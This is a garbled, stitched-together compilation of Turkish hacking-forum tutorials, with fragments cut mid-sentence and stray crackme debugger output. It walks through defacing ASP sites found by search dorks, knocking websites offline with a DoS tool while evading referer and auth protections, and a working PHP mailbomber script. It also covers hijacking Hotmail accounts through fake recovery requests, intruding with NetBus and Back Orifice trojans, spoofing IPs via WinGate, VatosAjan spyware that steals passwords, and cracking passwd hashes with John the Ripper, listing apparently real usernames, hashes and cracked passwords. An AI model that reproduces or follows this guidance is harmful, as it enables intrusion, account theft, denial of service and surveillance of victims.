birşey çünkü Crackme'yi kırdın..$ pass2:-$-$.....EAX ECX'e Eklenmiş 0167:004010A0 3BC6 CMP EAX.rar Simdi "Finde Site" adlı programı calistirin ve "Key wor" yazan yerin altına Ornek : hk filetype:asp yazın burda hk ulkelerin alan adı kısaltlamarı (Kuzey Kore) buraya baska uzantılar da yaza blirsiniz tr (turkiye) gibi domain uzantılarını mcuma...."-# asp destekli siteleri çökertme!!! Oncelile programı indirelim http://www.[EDI+04] 0167:0040109E 01C8 ADD EAX...e-bilisim..com/ulke... (ikiside aynı seyler zaten :-P yada benzeR ne farkeder :-) ) .. bu nedenle bie den fazla serialimiz oluyor.$ pass4:-#-#. 016F:00401324 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 .

" yazan yerin altına dusen siteleri hack etmis oluyoz..htm" yazdım sonra "Setar texto..asp yazmalısınız) yazdım sonra "listar" diyoz ve kaydetigimiz metin belgesini acıyoz ( hani su arama yaptıgımız siteleri metin belgesine atmsıtık ya onu :-P ) "Start Scan.htm yerine /demonsgod." dedikmi hack etmeye baslıyoz.." yazan yerin altınada bisiler salıyoz ben :-) " Hacked ßy gecekusu_always |-)" (isterseniz html kodları yada asp kodları da kulana bilirsiniz yanlız asp kod kulanıcanız zaman /demonsgod.. "Pages Own... NA Security Tester müthiş birşey mutlaka bakmalısınız -------------------------------------------------------------------------------- .(burda ki amac asp destekli siteleri bulmak... google daki arama tekniklerini iyi bi sekilde biliyosanız daha cok site bulabilirsiniz) hk filetype:asp yazdıktan sonra "Capture Links" diyoz we siteleri bulmaya baslıyo arama bitikten sonra tumunu seciyoz ve bi Metin belgesine kaydediyoz (*txt) Sonra "DavS" adlı programı acıyoz "Criar" yazan yerin altında ekliycemiz dosyanın adnını yazıyoz ben "/madboyiso..

5 . Yazılım 1.com sitesi de çevirim dışı olmuştur bu şahitlerde ispatlanmıştır.2.9 beta 3 Program Çok Etkili Bir Programdır Yazılım Geliştirilme süreci boyunca yapılan yüzlerce hatta binlerce test te etkisi kanıtlanmıştır. vb) ile korunan sitelerin / sunucuların yazılımdan etkilendiği ve çevirim dışı kaldığı testpit edilmiştir. sunucu aşırı efor sarf ederek normal ziyaretçilerden gelen isteklere cevap veremez duruma gelir ve çevirim dışı olur.7 -2.Evet Beyler Şimdi Size Çok Süper Bir Programdan bahsedeceğim Programın Adı : NA Security Tester v2.9 Beta 3 Programın Tekniği : GET Buffer Overflow Açığını Kullanarak DoS ( Denial OF Service) ataklara karşı sunucu güvenliğini test eder Etkilediği Sistemler : Bütün Windows Serverver Versiyonları Bütün Linux Sürümleri Bütün IIS .2. Download url 1: indirmek için tıklayın Program Yardımı ve Kullanmak Şekli -------------------------------------- Programı aşağıdaki şekilde kullanırsanız maksimum verim alırsınız: . Programla daha önce yapılan testlerde bütün donanımsal ve yazılımsal korumalar ( router .cisco.1.2. Hatta www.com sitesi dünyanın en önde gelen router friwall üreticidir.0 .6 .0 . friwall . Apache vb Sunucu Yazılımlarının tüm Versiyonları Tüm Donanımsal ve Yazılımsal Korumalar Routerlar Friwaller Güvenlik Çözümü : Yapılan Yüzlerce Teste Şuan İçin Herhangi Bir Çözüm Bulunamadı Açıklama : Bu program yukarda yazıldığı gibi GET Buffer overflow açığını kullarak socket handle dediğimiz handle leri sunucu tarafına yollar ve aşırı efor sarf etmesini sağlar.5 . html siteleri olmalarına rağmen 2 ayrı pc den yapılan eş zamanlı test sonucu www.2.cisco.ddos.com sitesi DoS ataklara karşı binlerce dolarlık koruma satan bir firma ama programla Tek bir pc den 256K ADSL bağlantıda 60 thread la yapılan test sonucu site kapanmıştır ve test sırasında bir yandan msn açık chat yaplıyor bir yandan sörf yapılıyor yani bağlantıyı kasmadan ayrıca msn de online olan kişilere sitenin online olup olmadığı sorulmuştur verilen cevap site kapalı yine www. program ile kendi sitenizin veya güvenlik hizmeti verdiğiniz müşterilerinizin sunucularının testini yapabilirsiniz.8 versiyonları daha önce çıkmıştır ve security ile ilgilen bir çok kişi bu programdan haberi vardır sanırum Suanki En Son Versiyon 2.

örneğin kendi dedicated server rında olan bir siteyi indirmek için normal shared host tan hizmet alan bir siteden daha fazla thread kullanmak gerekebilir Tarayıcı : Bu bölümü degiştirmenize gerek yoktur.php yazmalısınız.siteadi.php ise istek sayfasına index.deneme.php yazmalısınız örneğin test yapacagınız sitede forum varsa ve bu direk dizine degilde alt dizine kurlu ise yani www.siteadi. örnegin test yapacagınız sitede forum veya portal scripti farklı bir dizinde ise yani www.com/bb/index.com şeklinde yazın Thread : Buraya bilgisayarınızın özeliğine ve bağlantı hızınıza göre bir değer yazın.com/forum/index.php şeklinde internet explorer raz yazıdıgınızda sizi farklı bir sayfaya yönlendirip ordaki linke tıklarak foruma girmeye zorluyorsa referer bölümüne test yapacagınız sitenin adresini http://www.php şeklinde ise istek sayfasına forum/index.php yazmalısınız Referer: bu bölüm amaç için kullanıbilinir. örneğin bir portal sitede www.siteadi.com/forum/index. asp gibi server rı yorabilcek sayfa adrslerini yazmanız iyi olur.Hedef Site: buraya test yapacagınız sitenin domain nini başına http:// koymadan direk www.siteadi.siteadi. İstek Sayfası : buraya test yapacagınız sitedeki sayfa adını yazmanız lazım.siteadi.com şeklinde yazın Soru: bazı sitelerde sub-domain kullanılıyor ve başında www olmuyor bu durumda ne yapacağız? Cevap : örneğin test yapacagınız sitenin forumu http://forum.siteadi.com/ şeklinde ise Hedef site bölümüne yine başına http:// koymadan direk forum. bu bölüme özelikle php .php şeklinde ise istek sayfasına bb/index.com/tiklanansayfa. 1. bu bölüm test yapacagınız sitenin / server rın özeliklerine görede belirlemeniz gerekebilir.htm şeklinde yazmanız lazım . ancak site adminleri isapi ile belirliyi tarayıcıların siteye erişmesini engellerse bu bölümü degiştirerek yine test yapabilirsiniz. Hotlink koruması olan sitelerde : örneğin siz siteye girmek için wwww.com/index.

ama bunu bilgili admin ler yemez esas amacı hotlink korumasını aşmaktır İmza : Bu bölüme server loglarına bırakmak istediginiz imzayı girebilirsiniz.xxx.com admin leri loglarda sanki www.siteadi.com dan gelmiş gibi görebilir.com sitesine test yaparken referer bölümüne http://www. foruma giriş için direct.siteadi.com/forum/index.com/ yazarsanız www.com/direct. foruma giriş için index. eyer admin diyalog ekranında ortak bir kulanıcı adı ve parola belirlemişse Basic Auth ta username ye kullanıcı adını password dada şifreyi yazın eyer ortak bir kullanıcı adı ve parola yoksa ve illa şifre istiyorsa siteye girmek için kullanıcı adı ve parolayı kafanıza göre bişiler sallayabilirsiniz bazı sitelerde basic auth koruması ile referer koruması birlikte konur bu durumda siz ortak kullanıcı adı ve parolayı yazın birde hangi sayfadan tıklatıp foruma sokuyorsa o sayfanın url sini de referer ra yazın böylece yine siteyi/server rı kapatırsınız işlemez duruma getirirsiniz Şok Yap: Saldırı sırasında aktif olan bu buton server ra ani şok lar yaparak server rı felç eder. Saldırıya başladıktan bir iki dakka sonra Şok Yap butonuna 2-3 kere basabilirsiniz.xxx.htm yazmanız gerekli örnek 2.burda tiklanansayfa.com/index. diyelimki siz bir siteye kafayı taktınız günlerce kapatınız burayı bu sitenin admini parola korumalı klasör olarak yapabilir siteyi yani siz www.php diye girginizde pop-up olarak bir parolo ekranı ile karşılaşırsanız admin orda sizden belli bir kullanıcı adı ve parola girmenizi isteyecektir.siteadi.html den bir resim veya linke tıklayarak giriyorsanız referer bölümüne http://www.yyy.htm den kasit şudur siz siteye veya foruma girdiginizde size giriş için bir resime veya linke tıklamanız istenen sayfanın url sini gireceksiniz. örnek 1. örnek : KeNZoBoY was Here Örnek 2: zuhahaa sie lan artık ne isterseniz yazın --------------------Basic Auth Bu özelik şifre koruması olan siteler içindir.siteadi.yyy.com diye girdiginizde veya www. Salak adminleri şaşırtmak için piyasaya bilgisiz adminle dolu: siz www.htm den bir linke veya resime tıklamanız isteniyorsa referer bölümüne http://www. . test yaptığınız sitenin adminleri ve server adminleri log larda sizin imzanınızı görecektir.html yazmanız gerekli 2.

ayrıca bu butona basmadan önce Ctrl + Alt + Del İptal check box sını işaretleyip bu butona basarsanız program Ctrl + Alt + Del tuşunu iptal edecektir. Örnek .1numara. Yeni versiyonda gelen deyişiklikler 1-) Çoklu Dinamik Dil Desteği Eklendi. NA Security Tester v2.9. bunun için Languages klasörün içindeki English. Programı kullanan kişi programı istediği dile çevirebilcek. o dosyayı notepad ile açıp : işaretinden sonrasını kendi diline çevirmesi yeterlidir. program otomatik olarak o dile çevrilecektir.işin suyunu çıkarmayın çok basmayın Hidden Attack Mode : Yine saldırı sırasında aktif olan bu buton da programı gizleyebilirsiniz.org adresinden sürekli güncel linkler verilcektir. www.org veya bu başlık altında yazabilirsiniz --------------------Yeni verisyon Bildirimi : İşte Beklenen An Geldi.lng şeklinde yapıp. ------------------------------------Proxy Kullanma Proxy Kullan kutusunu işeretleyin gelen pencereden listeye çalışan sağlam proxy leri yükleyin proxyler iport formatında olmasına dikkat etin proxy ile test yapmanın temel amaçları: direk kendi ip adresinizden test yaptığınızda ip adresiniz banlanabilir bu durumun önüne geçmek için programa proxy server üzerinden test yapabilme özelliği eklendi Proxy kullanarak yapılan testin amacı hem siteyi kapatmak oldugu gibi sitenin bandwith ini aşırı derecede yiyerek sitenin suspend olmasını sağlamaktır soru : Proxy ile test yapıyorum ama site kapanmıyor neden? cevap : Kullandığınız proxy sayısı + proxylerin hızı + kullandığınız thread sayısı + bağlantı hızınıza orantılıdır etkisi ama proxy özeliğindeki temel amaç çook band yiyerek sitenin suspen olmasını sağlamaktır fakat yaptıgımız onlarca testte gördükki proxy ler sağlam olduktan sonra yine asp php gibi dinamik sayfalardan oluşan siteler portallar ve forumlar hemen kapanmış ve bir süre sonra suspend olmuştur soru ve teknik destek için : oyasiye@hotmail. ve bu topicte ve benim imzamda da sürekli güncel linkler olcaktır.lng dosyasının bir kopasını yine o klasörde kendi diladi.5 Download da sunuldu.com kenzoboy@1numara.

site. birçok kullanıcı istek sayfası bölümünde zorluk yaşıyordu. kodlama daha kararlı hale getirdi bir iki ufak hata giderildi. yani sizin yaptığınız her saldırı bize masraf getiriyor. otomasyon server rın masrafları demek istiyorum. internet explorer den copy paste de yapabilirsiniz 3-) İstatistikler Daha Görsel Hale Getirildi Kabul Edilen ve Red Edilen Paket Sayısına Yüzde Oranı Kondu yani kabul edilen ve red edilen paket sayısını ve bunun yüzde kaç olduğunu görebilceksiniz.0)I Agree:I Agree satırını :İşaretinden sonrasını kendi diline çevirecektir.com/ www. download etmek için www. biz iki satırı tek satıra dönüştürdük bundan sonra site adresi yazarken adresi istediğiniz formatta yazabilirsiniz yani tüm adresi Hedef Site Bölümüne yazacaksınız.com/forum/index.com www.1numara.com adresine yollasın bizde download da sunalım böylece o dili bilen insanlarda faydalansın. yeni sürümde gelen görüşler doğrultusunda kullanıcıyı rahatsız etmiycek boyularda ( 468*60 ) banner reklam uygulamasına geçildi.site.php site.php http://site. örnek formatlar www.org adresindeki linkleri kullanabilirsiniz.com/index.com/ http://site.com/forum/index. özelikle çoklu dil desteği eklememizden sonra yurt dışına açılcak bir program popülerliği katlancaktır. 2-) Hedef Site ve İstek Sayfası Tek Satırda.php www.site. Bugüne kadar bu programı hep cebimizden reklamsız ve ücretsiz olarak sizlere sunduk programıon geliştirilmesi sırasında harcanan masrafların yanı sıra programın çalışmasıda bize masraf getiriyor.site.com http://www.php http://www. programın geliştirilmesine destek vermek istiyorsanız reklamlarımıza tıklayabilirsiniz. Tıpkı İnternet Explorer da yazdığınız gibi.php http://site. Kabul Ediyorum bölümünü çevirmek istediği dile çevirip dosyası kaydetlemisiniz.com mail atın veya msn e gelin görüşelim.php örnek olarak verilmiştir.com/ site. .com/forum/index.com/forum/index. Örnegin Türkçeye Çevirirken 0)I Agree:Kabul Ediyorum şeklinde olcaktır. ilerde eklencektir yeni diller farklı dillere çeviren veya çevirebilcek arkdaşlar lütfen dil dosyasını oyasiye@hotmail.com/ http://www.site. bu programa reklam vermek istiyorsanız oyasiye@hotmail.php http://www.com/index.php site. ayrıca bu çok popüler bir program ve gittikçede popülerleşiyor.site.php not: burdaki index. bu adresteki linkler süreklü güncellenecektir.com/index.com http://site.site.com/index. 4-) Gözle Görülmeyen İyileştirilmeler yapıldı filtre sistemi iyileştirildi.com site. Şuan Türkçe ve İnglizce Çevirisi var. 5-) Reklam Modülü eklendi. saldırcağınız sitede adres neyse aynısını yazın.site.

ilk olarak bu olaylari gerceklestirmek icin 4 adet programa ihtiyacimiz var.sitem.. sincerely Icq'da Ip Ogrenme / Gizleme Yollari Dowload Kısmından Programı aldıktan sonra Dökümanı okuyup kolayca çözebilirsiniz. görebilmek için Javascript açık olmalıdır". örnek: adamin mailini yazin} ve farkli kaydet seceneginden dosyayi bir php dosyasi olarak kaydedin.sitem. Lütfen yeni sürüme geçiniz..php olarak kaydedilmeli. http://register. Bir diger yol ise icq versiyon ve buildinize gore bir ip crack kullanmaktir. ama lycos free server oldugu icin siniriniz var maksimum gunde 150 gonderiyor.. for ($t=1. $toplam=100. $subject = " konu ".net/contactus. .$subject.Could you change the password and send me new one so this can not use my account. boylece bu adresi her tikladiginizda adama 100 mail gidecek eger daha fazla göndermek isterseniz: $toplam=100. secenek olan try to open the port only" i secerek "scan!" butonuna basiyoruz.$t++){ if (mail($mailto. Sonra netbus'i (eger netbus kullanmayi bilmiyorsan Hemen Ögrenmeye Çalis. yani benim sitem : www. else echo "Gitmedi".. my name is: İSİM sign in: MAİL ADRESİN my birthday : DOĞUM TARİHİN country: ULKE state: ŞEHİR zip or postal code: POSTA KODU successfull sign: ENSON BAĞLANDIĞIN TARİH Approximate date of account registration: NEZAMANDIR BU ADRESİ KULLANDIĞIN List as many former passwords you used with this account as far back as you can remember: KULLANDIĞIN ŞİFRELER List as many of your Folders as you can remember: SAKLADIĞIN DOSYALAR VARMIYDI MAİLİNDE VARSA HATIRLADIKLARIN my internet service provider isİNTERNET BAĞLANTININ ADI I would like you to solve this problem..comBu mail adresi spam botlara karşı korumalıdır.When I send you a request about new password the ynformations also were not match the ones I remember and the ones you recorded. php destekli siteniz yoksa lycos tan bir tane alin. "Hostname or Ip" yazan yere kurbanimizin ip numarasini giriyoruz.srf BU ADRESE GİRİN VEYA ALTTAKİ TALİMATA GÖRE MAİL ATIN ALTAKİ DAHA UYGUN To: passport@css. -------------------------------------------------------------------------------- Çalınan Mail 24 Saat İçinde Geri Alma Mailiniz Çalındıysa bunu başka bir maille belirtip şifrenizi size yolluyolar yapmak için okuyun.. thanks your answer.com ise bu sayfa : www.. Icqnuzu crackledikten sonra icq detail /email de ipsini gorebilirsiniz. kodunda 100 yazan yere istediginiz rakami yazin.mirabiliz.. I also have seen someone is using my mesenger and chating with others on behalf of me. WhereIsIp adli programi bilgisayara kuruyorsunuz.) calistirip hostname/ip yazan yere wingateden buldugunuz IP'yi yazin.Passport Dear Sir / Madam I have been having proplem with my hot mail address.. Wingate.oneBu mail adresi spam botlara karşı korumalıdır. Diger programlari hack download bolumunden rahatlikla bulabilirsiniz ilk olarak irc'de kendimize bir kurban secip.. ip numarasini aliyoruz (/dns nickname). } ?> yukaridaki kodlari alin ve bir not pade icine yapistirin {degistirmeniz gerekenleri degistirin.com 'a bir bakim icq crackleri icin Kendi MailBomber'ını Kendin yapma Artık kendi mail bomber ınızı kendiniz yapın kodlar çalışmaktadır deneyin ve sonucu görün :) $mailto = " adamin@maili.Bo... Telnet (her windowsun icinde vardir).. kedi.com/kek.My phone bills credit card extres information come to this account and this person gives my phone numbers the other people. "Scan Port" kisminda 23 seklindeki rakamlari 12345 yapiyoruz sonra asagidan 3. sonra bu dosyayi alip sitenizin serverina kaydedin..Not: 2 hafta Sonra Eski Tüm NA versiyonların çalışması iptal edilecektir.php gibi. görebilmek için Javascript açık olmalıdır Sent: Mon Jul 7 23 : 30 : 39 PDT 2003 Subject: RE: CST122446699ID . $Headers = "From: mesajınızfgagawgawgawgawgag "."toplam: $toplam / $t Mail.. www. Daha sonra icq connections a bakip online olan herkesin ipsini goruyorsunuz. Thankyou in advance .$headers)) echo "Gitti". BASKASiNiN BiLGiSAYARiNA GiRMEK : Baskalarinin bilgisayarina girme ve internet sifrelerini calma olaylari nasil olur. orn. When I try to access to my account after ( BURAYA HACKLENEN TARİHİ YAZ) I found out my password and the secret question have been chanced. "Servers found" kisminda bir kac tane ip yazmasi lazim sansa bir tanesini secin.. If this is not possibble could you cancel my account.". Netbus. Başkasının Pc'sine Girmek Bilgilerin Hepsi önemlidir ama alttan başlıyım bunları bilmek gerekir.$t<$toplam.passport. Sonra wingate'i calistiriyoruz..

nereye yolliycagimizi soruyor...exe diyoruz..registry kayıtlarına ulaşabilme ve kendisini silme emirleriniuygulayabilecek interaktif bir casus yazılımdır. -Server Uzantısını değiştirebilme imkanı eklendi -Client görünümü ve logo değiştirildi -Türkçe ve İngilizce Dil Seçeneği eklendi ///////Alınabilen Şifreler\\\\\\\\\\\ # MSN Messenger # Windows Messenger (In Windows XP) # Yahoo Messenger (Versions 5. port a telnet cektiginizde . tamam netbustaki isimizde bitti.ve sifre fatihsayi oluyor....Böylece kendi iconlarınızı da kullanabileceksiniz.6 veya 1. devam edecekseniz tekrar yollamanız gerekiyor.1. istediğiniz dosyaları internetten indirip çalıştırabilme.If the password is saved in Yahoo! Messenger application..Bu aşamadan sonra kurban sizi engelleyemez (block layamaz) buda şu makımdan önemli aşşagıdaki komutları kurbana yacagımız için engellememesi gerekiyor bizi.7 yazar.. start program diyoruz.x/2003 # AOL Instant Messenger (only older versions.EXE). Sonra bir daha netbus'a bakiyoruz artik sifre fatihsayi giriyoruz. FunMaker2004 Msn'den olsun bütün herşeyi öğrenin karşınızdaki pc de neler oluyor :) Kesinlikle exe yi kendi pcnizde acmayın..siz fatihsayi yerine baska biseyde yazabilirsiniz.. Bo ile daha cok sey yapabilirsiniz...mail adresinizi değiştirebilme.. tekrar başlamak icin _spy komutunu tekrar yazıyoruz.. Versiyon Farkları -Win9x sistemlerde stabil çalışması sağlandı -FTP Server eklendi -Server ve serverin kullandığı dosyalar disk üzerinde gizlendi -Kullanılan componentler değiştirildi -Firewall ve Antivüslerin kapatılması sağlandı -Web Kontrol için firewall By Pass edildi -Servere ayar işleme yöntemi değiştirildi -Serverin başka bir dosya ile birleşince simgesinin korunması sağlandı -İlk Çalıştırılma esnasında sahte hata uyarısı verebilme özelliği eklendi -icon seçim yöntemi değiştirildi.x # Mozilla Thunderbird # Group Mail Free # Yahoo! Mail . VatosAjan bulaştığı bilgisayarın özelliklerini.) Kurbanın nickini degiştirir.fatihsayi bu yaziyi pasteliyoruz.EXE yerine ecard.. WINGATE ILE IP SPOOFING Esasinda wingate 1 den fazla bilgisayarin bir internet baglantisini kullanmasini saglamak icin kullanilir...dll" şeklinde bir hata mesajı alacak ve msn i kapanacakdır. Baglana gelip uzaktaki sistem'e tiklayin. şansınız yarı yarıya yani kolay gelsin. _spy Geldik asıl olaya : Kurbana gelen bütün mesajlar kurbanın yazdıgı bütün mesajları görürsünüz.) Kurbanın pc sinde kücük bi pencerede mesajınız yazar. Eger sifre isterse ne yapicaz ? Hemen Panik yok anlatiyoz iste..Ornek:internet cafeler.. # Hotmail/MSN mail .exe yi yolluyoruz. simdi sifreyi kirmak icin Password.Sifre isterse telnetten sifreyi kirmamiz lazım.123 ServerPwd.Eger sifre istemezse isiniz kolay.x and 6. HTTP and SMTP Accounts) # IncrediMail # Eudora # Netscape 6.Aşşagıdaki komutları kurbanızla yazışıyor gibi ona mesajı yazdıgımız yere yazıyoruz. the password in newer versions of AIM cannot be recovered) # AOL Instant Messenger/Netscape 7 # Trillian # Miranda # GAIM # Outlook Express # Microsoft Outlook 2000 (POP3 and SMTP Accounts only) # Microsoft Outlook 2002/2003 (POP3.Ve güm kurbanin bilgisayarindayiz.. couldn’t finde file win32... örnek : name(Dallama) yazarsanız kurbanın nicki dallama olur msg(.. Yani offline oldu ise kurban amacımıza ulaşmışız demektir....x) # ICQ Lite 4.Kurbana exe yi yolladınız ve kabul ettiyse dolayısıyla calıştırdıysa . File Manager'a gelerek Kurbana boserve..) Kurbanın yazdıgınız adresi acmasını saglar. "Error. baglana tikliyoruz.(port 23)Bir wingate server da yani wingate yuklu ve calismakta olan makinada 23. Ana bilgisyar adi: wingatede buldugmuz IP'yi yaziyoruz Baglanti Noktasi kismina ise netbus portu olan 12345 yaziyoruz.istediğiniz dosyaları mailinize gönderme. Telnet her windowsta vardir. .Sadece VatosAjan'da bulunan WEB KONTROL özelliği ile router veya direk bağlantı farketmeksizin kurbanın bilgisayarında dosya arama....4 Vatos süper bir hack programıdır kesin öğrenmeniz lazım :) VatosAjan 2. #MSN Explorer Şifreleri.exe yapabilirsiniz.4 Hakkında. Bu dosya karşı tarafa yollanacak (MsnFunMakerV204. .Bu arada kurbanda cikan pass'ler:Eger basarisiz olursaniz ki bunu hic zannetmiyorum cünkü bundan dahada bi basit sekilde nasil anlatilir bilemiyorum VatosAjan 2.. Biz winGate in telnet cikisini kullanacagiz..kurbanın şifre ve keylog kayıtlarını mailinize gönderen Bünyesinde bulunan FTP Server ile kurbanın bilgisayarına bağlanılabilen. c:\windows yazarak windowsun altina atiyoruz yolladiktan sonra download ekranini kapiyoruz... Simdi Back Orifice'ye(Eger Bo kullanimida bilmiyorsan "HEMEN ÖGREN") geçiyoruz target hostport'a kurbanin IPsini yaziyoruz..... yukarda netbus 1.downloader gibi çalışıp. IMAP.If the password is saved in MSN Messenger application. firewal lara takılma ihtimali var. Acıklamarın Hepsini cevirmiyorum Kısaca : 1 ay icinde kendi kendini kaldırıyomuş.c:\windows\boserve. www(..exe nin adını degiştirebilirsiniz ama uzantısını degiştirmeyin.. _nosend Kurban ın yazdıkları siz haric kimseye gitmez ama o gittigini sanır. Bu komutlar kesinlikle kurban tarafından gözükmüyor KOMUTLAR : name(.x/7. VatosAjanın alabildiği şifreler aşağıda yazılmıştır. Yani MsnFunMakerV204. yan tarafada 12345 yan taraftan system passwordsu secip send e basiyoruz ve bingoooo bu adamda 10un ustunde password varmis...... Bul (find) dan telnet'i buldurup calistirin. bu özelligi kapatmak icin chat penceresini kapatmanız yeterli. . bide koparsak geri baglanırsak tekrar yazıyoruz. # Gmail #Otomatik tamamlanan Internet Explorer şifreleri..dosya silme.

su cevabi alirsiniz. Simdi wingate ip lerimiz hazir dielim. eger aciksa belli bir cevabi(recieve string) verip vermedigini kontrol eder.54.48. Yine bisuru sey sayikliyacaktir onlari da iplemeyin .edu.33.comBu mail adresi spam botlara karşı korumalıdır.54..Bir wingate server i bulma: Bunun icin en temiz yol domain scanner yada gate scanner adi verilen programlardan kullanmak ve boylece kendi serverlarimizi bulmaktir..siz degisdirmediginiz surece(halimize bak bi default lafi kullanmicaz diye kendimizi paraliyoz) port 23 ve receive string WinGate> dir yani wingate serverlarini tespit etmeye hazirdir.226.tr Connected" demesi.Bunu gorunce /quote user xxxxx xxxxx mail@adresiniz. Mesela ip miz 195. görebilmek için Javascript açık olmalıdır xxxxx --> bu xx lerin veya mail in oldu yerde ne yazdy?y muhim degildir.edu.edu..Istediginizi yazabilirsiniz muhim olan kelime . WinGate> deyince /quote irc. portuna baglanacak WinGate> cevabini verip vermediklerini kontrol edecektir..Bunlar millet size whois cektiginde gorunecek yazilardir.48.Tabi burdan baglandigimiz makinalarda bizim degil baglandigimiz wingate server in ip sini goreceklerdir.emin olmak isterseniz sitedeki wingate listesindeki server lari kullanin..54.Tavsiyem GateScan programi.Ayni sekilde isterseniz add server ile listenizede ekleyip sonra bu server lara direkt connect te edebilirsiniz.tr olsun mIRC yi acin /server 195. WinGate> bu komut satirinda komutlar vererek baska yerlere baglanmak mumkundur.226. bir suru yazilar gelecektir look up failed falan filan gibi onlari hic takmayin.0 dan baslayarak 194.5 olsun. Muhim olan "irc.Piyasada disariya acik oldugu bilinen yuzlerce server vardir ama bunlari kullanmanizi tavsiye etmem cunku herkes onlara yuklendigi icin bunlardan spoofladiginizda lag a girersininiz.Bu program verilen ip araliklarinda secilmis bir port un acik olup olmadigini .En guzel serverlar Boyle Gecici ip lerden cikar.. Normal durumda.tr:6667 ---->Bu komutla irc server a o server dan atliyoruz. Ama 2 saat sonra nolucagini bilemezsiniz.WinGate> demesini bekleyin..48.En ustteki kutuya bir ip yazdiginizda ornegin 194.33.63 olsun 194.5:23 ----------->bu komutla sanki bir irc server a baglanir gibi wingate server a baglaniyoruz. Asama -1.emu.255 e kadar hepsinin 23 .Tavsiyem irc ye girin millete dns cekin gelen ip leri buraya yazin..emu.Spooflayacagimiz server da irc.emu.

/quote nick isminiz Bundan sonra bekleyin her zaman oldugu gibi irc de olmaniz gerekir.Ama birinci soru bu passwd shadowed mu.ISPRO:/root:/usr/local/bin/tcsh Bu satirlarda shadow lanmamis passwd den:: (Bm -Net) atabarut:iP0nvdXsd0bE2:504:100:Necdet Atabarut:/home/atabarut:/bin/sh abali:btf6TGc5jaCwY:505:100:Muammer Abali:/home/abali:/usr/local/bin/dmenu ceyhun:7kTb6N0tEaTcE:508:100:Ceyhun Ors:/home/ceyhun:/usr/local/bin/dmenu kadircan:xt4UmVJxTBpbw:507:100:Kadircan Abali:/home/kadircan:/usr/local/bin/dmenu Sanirim bunda incelemeye gerek yok olay acik. John The ripper programini cekmelisiniz.sayisinin ayni olmasi. .Girdiginiz zaman kendinize /whois ve /dns cekerek spoof unuzu deneyebilirsiniz ŞİFRE BULMA VE KIRMA John The Ripper Programıyla Acc kirmak icin passwd diye adlandirilan dosyalardan elinizde bulunmasi lazim bunu bazi yeni isp lerin ftplerinden (oranin ftp kullanici iseniz genelde etc/passwd dizininde bulunurlar) cekmenize izin verirler. Örnek : John passwd.ispro. Bu tip dosyalari toparladiktan sonra. Yani asil almaniz gereken dosya shadowed sitemlerde /etc/shadow dur ama bu dosyaya erisim hakki sadece super user a aittir.ISPRO:/root:/usr/local/bin/tcsh toor:*:0:0:Bourne-again Superuser:/root xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent ilk satiri inceleyelim s.Anonymous baglantilarda bu dosyalari cekmenize izin verilmez. BEEP ise her pass kirdiginda bip sesi cikarmasini saglar. Simdi John da kendiliginden 3 adet kirma bicimi var.ispro.N| |ayrintilar| |dizini| |shell dizini ve turu| root:*:0:0:finland.net. Bunlar: ALPHA : Sadece harfler DIGITS : Sadece rakamlar ALL : Hepsi Simdi John.simdi siz herhangi bir yöntemle passwd yi cektiniz.N= shadow nosu=shadow file daki no su |user| |s. Bulduk Simdi altta Minimum ve Maximum lenght var. Şunları yazın: JOHN dosyaadi -i:bicim -beep (burada dosya adi bizim netten cektigimiz passwd dosyasi oluyor.Shadowed passwd lerde sadece o user in sifresinin shadow file daki yerini belirten bi sayi olur ve o sayiya göre makine shadow file a bakar ve o username icin girelen password ile dosyadaki password u karsilastirir.Eger olmassa baska serverlar deneyin.tr.Kiramazsiniz Alin size Shodowed ve un Shadowed passwd örnekleri:: Bu satirlar shadowed bi passwd dosyasindan alinmistir(ispronet Clansman'dan aldım lawuk shadowed u cekmis euheuhe) root:*:0:0:finland. SOL dışında Turkiye'deki butun ISP lerde minimum 4 maximum 8 hane vardir. Daha sonra dos komut satırında. Mesela ALPHA yi bulalım.ini dosyasını açtıgınızda oradan kullanacagınız bicimi bulun. Tamam bunuda ayarladık diyelim. Bunlar en az ve en cok hane sayısıdır.txt -i:ALL -beep heee bide wordlist ile Kirma Yöntemi vardir.tr.net.(root)Yani sikar biraz. Burda bicim yerine ALL ALPHA veya DIGITS yazicaksiniz.Ayni seyler gecerli. Kisaca Shdowed bi dosya Shadow file olmadan bi bok a yaramaz. Bu Yöntem Çok Degisiktir:ilk önce bir wordlist yaratirsiniz (Çok iyi Bir Arsiv Hazirladim!!!Kesin Bulundurun!! Woodlist John butun harfleri ve digitleri teker teker deneyecegine sizin verdiginiz Dosyadaki kelimeleri dener!! Kullanim Yöntemi ise:: john <dosya adi> -w:<wordlist adi> -beep ------------John The Ripper Kullanma Kilavuzu----------John the Ripper(kisaca John amca) bence piyasada bulabilceginiz en baba unix passwd cracker dir.

Wordlist olusturmak icin meliksah aganin Sibop unu tavsiye ederim. Eger Wordlist ne derseniz belli sayida harfin tum kombinasyonlarinin her satirda bir kelime olmak uzere metin dosyasi haline getirilmisidir. John -single dosyaadi>kayitdosyasi kayit dosyasi olayina tekrar girmicem heralde kapmissinizdir.Bu komut cok faydalidir ama herkes ilk bunla kiracagi icin kircaganiz acc lar coktan orospu olmus herkesin eline gecmistir. Cok hizlidir 5 dk da ato dan 90 tane acc kirarsiniz.97 by Solar Designer Loaded 201 passwords with 170 different salts (DES) onguru10 (onguru) aytac11 (ksoytac) aytac11 (ksaytac) ali19 (ayata) tunay94 (tunay) ofalay96 (ofalay) hyb96 (ferhan )hyb96 (ertugrul) tatko97 (tatko) uler97 (mukaddes) kbc97 (kbc) susen97 (susen) ttggrd97 (ttggrd)bircan97 (bircan) bilal97 (bilal) ykocak97 (ykocak) aaker97 (aaker) levent97 (levente) aristo97 (aristo) Parantez icindekiler usernamedir.hasan-amcukins gibi. ------Kayıt dosyasi olmadan kirma komutu-----------john -wordfile:listedosyasi -pwfile:sifredosyasi bu komut ile kirdiginizda sifreler ekrana cikar.Ama kayit dosyasi bu riski kaldirir.Format falan atarsaniz yada john. > kirilan sifrelerin kaydedilecegi dosya adini buraya yaziniz. size bi tavsiye 4 karakterli sadece sayidan olusan bi wordlist hazirlayin (0.-----------şimdi gelelim kırma işlemine-----------Benim tavsiyem Wordlist yani kelime listesi kullanmaniz.Alpha yazarsaniz harfler uretilir. -------------------örnek verim-----------------John the Ripper Version 1. (8 karakterli bir wordlist= 1.Diger modlarda kiriniz.4 Copyright (c) 1996.5 mb bile tutmaz)Dogum tarihini sifre yapanlari 